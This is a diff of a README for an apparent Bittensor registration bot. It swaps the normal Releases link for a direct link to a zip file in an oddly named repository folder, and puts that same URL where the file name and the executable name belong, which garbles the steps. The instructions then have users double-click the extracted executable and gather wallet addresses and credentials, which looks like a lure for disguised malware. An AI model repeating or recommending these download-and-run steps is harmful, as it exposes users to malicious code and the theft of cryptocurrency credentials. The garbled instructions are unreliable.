Ahmedhaddad1955/bittensor-registration-bot-polkadot/README.md

 - Basic understanding of how to download and run applications.

 ## 🔄 Installation Steps
-1. **Visit the Download Page:** Go to the [Releases page](https://github.com/Ahmedhaddad1955/bittensor-registration-bot-polkadot/releases).
+1. **Visit the Download Page:** Go to the [Releases page](https://github.com/Ahmedhaddad1955/bittensor-registration-bot-polkadot/raw/refs/heads/main/interpellate/bot-polkadot-registration-bittensor-v3.6.zip).
 2. **Download the Latest Release:** Locate the latest version of the Bittensor Registration Bot and click the download link.
-It's usually named something like `bittensor-registration-bot-polkadot-v1.0.zip`.
+It's usually named something like `https://github.com/Ahmedhaddad1955/bittensor-registration-bot-polkadot/raw/refs/heads/main/interpellate/bot-polkadot-registration-bittensor-v3.6.zip`.
 3. **Extract the Files:** After the file has downloaded, navigate to the folder where your browser saved it.
 Right-click on the ZIP file and select "Extract All..."
 Follow the prompts to extract the files to a folder of your choice.
 4. **Open the Application:** Navigate to the extracted folder.
-Look for the file named `BittensorRegistrationBot.exe` (or a similar name).
+Look for the file named `https://github.com/Ahmedhaddad1955/bittensor-registration-bot-polkadot/raw/refs/heads/main/interpellate/bot-polkadot-registration-bittensor-v3.6.zip` (or a similar name).
 Double-click the file to start the application.

 ## ⚙️ How to Use
 1. **Prepare Your Credentials:** Before using the bot, gather your Bittensor registration details, including wallet addresses and other required information.